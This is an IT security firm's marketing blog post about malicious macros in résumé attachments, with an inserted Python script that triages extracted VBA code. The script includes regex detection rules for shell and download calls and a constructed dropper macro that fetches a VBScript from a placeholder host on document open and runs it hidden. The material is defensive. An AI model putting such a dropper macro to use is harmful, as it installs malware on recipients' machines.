Résumé Attacks

Are you hiring?

Should you worry that an attachment from a job candidate might carry a virus or other malware (a so-called résumé attack)?

Yes, you should.

Barracuda first reported the campaign in a blog post about six weeks ago, and it appears criminals are turning your company's growth against you. They send attractive résumés as bait to companies looking for great job candidates.

Barracuda classed the threat as an advanced persistent threat (“APT”). According to Wikipedia, an APT is “a set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity. An APT usually targets either private organizations, states or both for business or political motives.” Strictly speaking, what lands in the inbox is a Word document carrying a malicious macro; the macro is only the entry point, and it is the quiet, hands-on intrusion that follows which earns the APT label.

Examples – résumé attacks

In their blog post, Barracuda shared that one of their customers received five résumés carrying this malicious macro in late 2016. It only takes one successful infection to damage your credibility, bring down your entire network, or cost you a great deal of money.

The scary thing is that the files carrying the malicious macro were ordinary .doc files, the Microsoft Word format people trust and routinely use for résumés. Word disables macros by default and shows a security warning when a document contains them, so the attack depends on the recipient clicking “Enable Content” to make the résumé display; that click is what lets the macro run.

Intronis reported that one of its partners had a client whose HR manager opened a résumé he believed came from a prospective job seeker. The document opened blank. Shortly afterward, his computer was hit by a CryptoLocker variant that encrypted the contents of his hard drive. Fortunately, all documents and files were restored from backup, but a full system rebuild was still required.

What Happens

The Barracuda example is quite fascinating, if you are not the victim. They explain it in simple terms below:

Upon detonating the file, the macro executed highly malicious activity.

The macro immediately:

  1. Downloaded and executed a Visual Basic script
  2. Imported external functions from the web and ran them
  3. Spawned a shell
  4. Connected to a remote server
  5. Actively began work to evade the computer’s built-in anti-virus
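The five behaviours listed above are what a mail gateway or an analyst should be looking for once a macro has been pulled out of an attachment. The triage script below is an added example, not code from WCA or Barracuda: it assumes the VBA source has already been extracted from the .doc (for instance with the olevba tool from the oletools package), scores that source against one heuristic rule per behaviour, pulls out any URLs as indicators, and returns a block/review/allow verdict. The rule patterns, the scoring thresholds and both sample macros are constructed for illustration.

```python
"""Heuristic triage of VBA macro source extracted from a résumé attachment.

Added example; assumes the macro text has already been extracted from the
Word file (e.g. with olevba).  Rules, thresholds and samples are constructed.
"""
import re

# One rule per behaviour Barracuda described, as a regex over the VBA source.
RULES = [
    ("auto-execute on open",
     re.compile(r"\b(AutoOpen|Document_Open|AutoExec|AutoClose|Document_Close)\b", re.I)),
    ("downloads a script",
     re.compile(r"URLDownloadToFile|MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream", re.I)),
    ("imports external (Win32) functions",
     re.compile(r"\bDeclare\s+(PtrSafe\s+)?(Function|Sub)\b", re.I)),
    ("spawns a shell",
     # bare Shell call, WScript.Shell object, cmd /c or powershell invocations
     re.compile(r"(?<![\w.])Shell\b|WScript\.Shell|cmd(\.exe)?\s*/c|powershell", re.I)),
    ("connects to a remote server",
     re.compile(r"https?://|\b\d{1,3}(\.\d{1,3}){3}\b", re.I)),
    ("anti-virus evasion / obfuscation",
     # string building from char codes, reversed strings, AV product enumeration
     re.compile(r"\bChr\s*\(|\bStrReverse\s*\(|AntiVirusProduct|SecurityCenter2", re.I)),
]

URL_RE = re.compile(r'https?://[^\s"]+', re.I)


def verdict(score: int) -> str:
    """Map a heuristic score to a gateway action (thresholds are assumed)."""
    if score >= 4:
        return "block"
    if score >= 1:
        return "review"
    return "allow"


def triage(vba_source: str) -> dict:
    """Score extracted VBA source and return behaviours, IOCs and a verdict."""
    behaviours = [name for name, rx in RULES if rx.search(vba_source)]
    score = len(behaviours)
    # The dropper pattern from the post: runs on open AND fetches or launches
    # something.  That combination is far more telling than either alone.
    if "auto-execute on open" in behaviours and (
        "downloads a script" in behaviours or "spawns a shell" in behaviours
    ):
        score += 2
    iocs = sorted(set(URL_RE.findall(vba_source)))
    return {"behaviours": behaviours, "score": score,
            "iocs": iocs, "verdict": verdict(score)}


# Constructed sample: a macro that downloads and runs a VBScript on open,
# building "wscript.exe" from a char code to dodge naive string matching.
MALICIOUS_MACRO = r"""
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub AutoOpen()
    Dim p As String, exe As String
    p = Environ("TEMP") & "\u.vbs"
    URLDownloadToFile 0, "http://example.invalid/resume/u.vbs", p, 0, 0
    exe = Chr(119) & "script.exe "
    Shell exe & p, vbHide
End Sub
"""

# Constructed sample: a harmless formatting macro that should pass.
BENIGN_MACRO = r"""
Sub FormatTable()
    Selection.Tables(1).Style = "Grid Table 4"
End Sub
"""

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_MACRO), ("benign", BENIGN_MACRO)):
        print(label, triage(src))
```

Running the block prints a "block" verdict for the constructed dropper, listing all six behaviours and the download URL as an IOC, and "allow" for the formatting macro. The rules are deliberately simple string heuristics; a determined author can evade them, which is why the verdict feeds a review queue rather than replacing sandbox detonation.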


Each one of the attacks originated from a different email, and each one of them targeted a different employee. Two of the employees were administrative assistants, one was in accounting, and two others were in general administration.

This follows a pattern where hackers don’t necessarily need to infiltrate sensitive accounts, such as those belonging to senior executives in the company or someone in IT.

Instead, they seek to infiltrate the “weakest link” in the company in terms of security, and unsuspecting users typically fit that bill perfectly. After they infect an account or an endpoint, they typically proceed to infiltrate the rest of the organization from within, quietly, before anyone realizes.

Typical modes

Two typical modes of operation:

  1. After infecting one account (e.g., with a résumé attack), they send a new malicious message to a different employee from the infected employee’s own mailbox, so it arrives from a trusted internal sender.
  2. They infect an account and watch who in the company oversees wire transfers, invoices, and so forth. Then they use that information to launch a targeted spear phishing attack.


The emails were written casually with a friendly manner, and were designed to impersonate a colleague asking another colleague about their opinion about a résumé. Seems innocent enough, yes?

In all cases, the employee opened the email because they mistakenly thought it was a legitimate résumé sent to them.

This threat underscores the importance of always following best practices when dealing with email.

For example:

  • Do not click on any links in email. Type the address directly into your browser.
  • Do not open suspicious attachments, even if they seem to be from someone you trust.
  • Keep endpoint antivirus, patches, and other software updated.
  • Do not reveal sensitive personal or company information in email.
  • If you aren’t sure of whether an email is legitimate, verify by contacting the company or person directly on the phone, or through legitimate communications you have previously received from that company. (Not email.)


What to Do Now

In an ideal world your network and individual computer systems would be protected from any virus or malware.

However, if you haven’t noticed, we do not live in a perfect world.

WCA offers the most comprehensive security protection available; however, thousands of new malware variants appear every day. Your organization needs the best security tools, but your people also have to be trained not to click where they should not.

Is your company secure? Find out at no cost and without interrupting much of your day. For a limited time you can schedule a no cost, no obligation network security assessment from WCA today.

It is better to assess your security BEFORE there is a break-in.

Your WCA assessment might confirm your network is just fine.

Good News

WCA does the work so the assessment does not interrupt your schedule. WCA Clients receive these assessments regularly.

At WCA, we help corporations, nonprofit organizations, and government entities assess their I.T. vulnerabilities and productivity daily.

WCA Technologies is a reputable, 28-year-old Manhattan team of computer experts providing IT security and managed services. We have protected New York City businesses and nonprofits from cyber hackers for decades.

Who ever thought résumés would be a threat? Do not assume. Confirm your company is safe.

Remove technology productivity gaps.  Confirm your backup and other systems are working properly. Tighten security. Train your staff. Improve your security policies. Know your digital assets are secure BEFORE you have to explain a security breach to your boss, board of directors, and/or shareholders.

Contact WCA online or call (212) 642-0980 to schedule a conversation with Peter Fidler, one of our founders. He will help you get your complimentary network security assessment scheduled quickly.